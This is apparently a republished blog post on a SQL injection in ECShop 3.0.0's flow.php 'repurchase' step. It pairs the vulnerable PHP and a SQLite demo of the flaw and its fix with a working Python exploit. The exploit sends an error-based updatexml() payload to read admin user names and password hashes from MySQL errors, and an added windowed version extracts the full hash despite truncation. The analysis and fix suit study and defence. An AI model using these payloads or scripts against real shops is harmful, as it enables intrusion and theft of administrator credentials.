  • ecshop 3.0.0 injection

    Setting up an environment to demonstrate this to someone, plus a short analysis. The flaw is in flow.php, in the `repurchase` step: `order_id` from the POST request is concatenated into the SQL statement without single quotes (and without an integer cast), so it is injectable. `strip_tags()` only removes HTML tags and `json_str_iconv()` only converts the character set; neither touches SQL syntax, and because the value sits in the query unquoted, the payload needs no quote to break out. The value is used twice: first in the `count(*)` ownership check against `order_info`, and again in the `order_goods` query.

    <?php
    // flow.php, 'repurchase' branch of the step dispatcher (excerpt of a larger file).
    elseif ($_REQUEST['step'] == 'repurchase') {
        include_once('includes/cls_json.php');
        // strip_tags() only removes HTML tags and json_str_iconv() only converts
        // the character set; neither escapes or casts the value for SQL.
        $order_id = strip_tags($_POST['order_id']);
        $order_id = json_str_iconv($order_id);
        $user_id = $_SESSION['user_id'];
        $json  = new JSON;
        // Sink 1: $order_id is concatenated unquoted, with no intval(), into the ownership check.
        $order = $db->getOne('SELECT count(*) FROM ' . $ecs->table('order_info') . ' WHERE order_id = ' . $order_id . ' and user_id = ' . $user_id);
        if (!$order) {
            $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
            die($json->encode($result));
        }

        $db->query('DELETE FROM ' .$ecs->table('cart') . " WHERE rec_type = " . CART_REPURCHASE);
        // Sink 2: the same unsanitised value is reused in a second query.
        $order_goods = $db->getAll("SELECT goods_id, goods_number, goods_attr_id, parent_id FROM " . $ecs->table('order_goods') . " WHERE order_id = " . $order_id);
        $result = array('error' => 0, 'message' => '');
        foreach ($order_goods as $goods) {
            $spec = empty($goods['goods_attr_id']) ? array() : explode(',', $goods['goods_attr_id']);
            if (!addto_cart($goods['goods_id'], $goods['goods_number'], $spec, $goods['parent_id'], CART_REPURCHASE)) {
                $result = false;
                $result = array('error' => 1, 'message' => $_LANG['repurchase_fail']);
            }
        }
        die($json->encode($result));
    }

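    To make the two sinks concrete, here is an added example (my own code, not from the post and not ECShop's) that replays the two queries above in Python against an in-memory SQLite database with constructed sample data, beside a hardened version that validates `order_id` as an integer and binds parameters. The table names `ecs_order_info` / `ecs_order_goods` follow the `$ecs->table()` prefix and the rows are made up. SQLite has no `updatexml()`, so the payload used is a plain `or 1=1`, which shows the other consequence of the bug: the `user_id` ownership check is bypassed and another customer's order contents come back.

```python
import sqlite3

# Constructed sample data (not from the page): (order_id, user_id)
ORDERS = [(1, 5), (2, 9)]
# (order_id, goods_id, goods_number)
ORDER_GOODS = [(1, 101, 1), (2, 202, 3)]


def make_db():
    """Build the in-memory stand-in for the ecs_order_info / ecs_order_goods tables."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE ecs_order_info (order_id INTEGER, user_id INTEGER)")
    db.execute("CREATE TABLE ecs_order_goods (order_id INTEGER, goods_id INTEGER, goods_number INTEGER)")
    db.executemany("INSERT INTO ecs_order_info VALUES (?, ?)", ORDERS)
    db.executemany("INSERT INTO ecs_order_goods VALUES (?, ?, ?)", ORDER_GOODS)
    return db


def repurchase_vulnerable(db, order_id, user_id):
    """Same string building as flow.php: order_id lands in the SQL unquoted and uncast.

    Returns None where flow.php would answer 'repurchase_fail', otherwise the
    goods rows the second query returns."""
    sql = ("SELECT count(*) FROM ecs_order_info WHERE order_id = " + order_id
           + " and user_id = " + str(user_id))
    if not db.execute(sql).fetchone()[0]:
        return None
    # AND binds tighter than OR, so '2 or 1=1' makes the check read
    # order_id = 2 OR (1=1 AND user_id = 5): the ownership test is bypassed.
    sql = ("SELECT goods_id, goods_number FROM ecs_order_goods WHERE order_id = "
           + order_id + " ORDER BY goods_id")
    return db.execute(sql).fetchall()


def repurchase_fixed(db, order_id, user_id):
    """Hardened version: integer validation (PHP would use intval() or a ctype
    check) plus bound parameters, so the value can never become SQL syntax."""
    try:
        oid = int(order_id)
    except ValueError:
        return None  # not a number: reject before it reaches the database
    row = db.execute(
        "SELECT count(*) FROM ecs_order_info WHERE order_id = ? AND user_id = ?",
        (oid, user_id),
    ).fetchone()
    if not row[0]:
        return None
    return db.execute(
        "SELECT goods_id, goods_number FROM ecs_order_goods WHERE order_id = ? ORDER BY goods_id",
        (oid,),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # user 5 does not own order 2: the honest request is refused ...
    print(repurchase_vulnerable(db, "2", 5))          # None
    # ... but the injected value passes the check and dumps every order's goods
    print(repurchase_vulnerable(db, "2 or 1=1", 5))   # [(101, 1), (202, 3)]
    print(repurchase_fixed(db, "2 or 1=1", 5))        # None
```

    The `or 1=1` form is the quieter variant of the bug: no database error, just the authorisation check silently passing for any order the attacker names.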
    ecshop 3.0.0 injection detection script (wrote one out of boredom). It sends an error-based `updatexml()` payload and reads the admin credentials out of the MySQL error text echoed in the response; if the site does not echo database errors, the injection is still there but this check reports nothing.

    #coding:utf-8
    #ecshop 3.0.0 flow.php sql injection
    #author:jwong

    import re
    import sys

    import requests


    def get_md5(url):
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0"
        }
        # order_id is concatenated unquoted in flow.php, so no quote is needed;
        # updatexml() raises an XPath error whose text carries the subquery result.
        # "limit 0,1" keeps the subquery to one row when several admins exist.
        # NOTE: MySQL shows at most 32 characters of the XPath expression, so a long
        # user_name pushes part of the 32-character hash off the end.
        payload = {
            "order_id": "1 or updatexml(1,(select concat(0x3a,user_name,0x3a,password,0x3e)"
                        " from ecs_admin_user limit 0,1),1)#"
        }
        urls = url + '/flow.php?step=repurchase'

        req = requests.post(urls, data=payload, headers=headers)
        print(req.text)

        if req.status_code == 200:
            pattern = re.compile(r"XPATH syntax error: '(.*?)'")
            matches = re.findall(pattern, req.text)
            if not matches:
                print('no MySQL error in response; database errors may be suppressed')
                return
            new_list = matches[0].split(':')
            username = new_list[1]
            password = new_list[-1].rstrip('>')
            print(username + ':' + password)


    if __name__ == '__main__':
        if len(sys.argv) < 2:
            print('usage: python ecshop.py url')
            sys.exit()
        url = sys.argv[1]
        if not url.startswith(('http://', 'https://')):
            url = 'http://' + url
        get_md5(url)

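    The one-shot script above hits the 32-character cap MySQL puts on the XPath expression it reports, so with the `:user_name:password>` framing the hash is cut off. As an added example (my own code, not from the post), here is the same error-based technique done in windows: each request leaks 31 characters via `substr()` behind a `~` sentinel, and the client walks forward until a short chunk marks the end. The target is a constructed simulator holding a made-up `admin:md5` row and echoing the error the way MySQL truncates it; table and column names (`ecs_admin_user`, `user_name`, `password`) are the page's.

```python
import re

# MySQL reports at most 32 characters of the offending XPath expression.
LIMIT = 32
# One character is spent on the '~' sentinel that forces the error; 31 carry data.
WINDOW = LIMIT - 1

# Constructed credential the simulated target "holds"; the hash is md5('admin').
FAKE_ROW = "admin:21232f297a57a5a743894a0e4a801fc3"

ERR = re.compile(r"XPATH syntax error: '~([^']*)'")


def build_payload(pos, width=WINDOW):
    """order_id value leaking characters pos..pos+width-1 (1-based, as MySQL substr()).

    No quote is needed because flow.php concatenates order_id unquoted."""
    expr = ("substr((select concat(user_name,0x3a,password) from ecs_admin_user"
            " limit 0,1),%d,%d)" % (pos, width))
    return "1 or updatexml(1,concat(0x7e,%s),1)#" % expr


def parse_chunk(body):
    """Pull the leaked window out of the echoed MySQL error, or None if none was echoed."""
    m = ERR.search(body)
    return None if m is None else m.group(1)


def dump_admin(send, width=WINDOW):
    """Walk the concat() result window by window until a short chunk marks the end.

    `send` takes an order_id value and returns the HTTP response body as text."""
    out = ""
    pos = 1
    while True:
        chunk = parse_chunk(send(build_payload(pos, width)))
        if chunk is None:
            raise RuntimeError("no MySQL error in response; the site may suppress DB errors")
        out += chunk
        if len(chunk) < width:
            return out
        pos += width


# --- simulated target (constructed; stands in for a live ECShop 3.0.0) ----------
PAYLOAD_RE = re.compile(r"substr\(\(.*?\),(\d+),(\d+)\)")


def fake_send(order_id):
    """Apply the substr() window to FAKE_ROW and echo the error truncated to LIMIT chars."""
    m = PAYLOAD_RE.search(order_id)
    pos, width = int(m.group(1)), int(m.group(2))
    shown = ("~" + FAKE_ROW[pos - 1:pos - 1 + width])[:LIMIT]
    return "MySQL server error report: XPATH syntax error: '%s'" % shown


if __name__ == "__main__":
    print(dump_admin(fake_send))  # admin:21232f297a57a5a743894a0e4a801fc3
```

    Against a live target, `send` would be a small wrapper around the same `requests.post(url + '/flow.php?step=repurchase', data={'order_id': value})` call the script uses, returning `.text`; the sentinel also guarantees the XPath error fires even when the window comes back empty, which is how the end of the row is detected.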
  • Original address: https://www.cnblogs.com/whoami101/p/5848921.html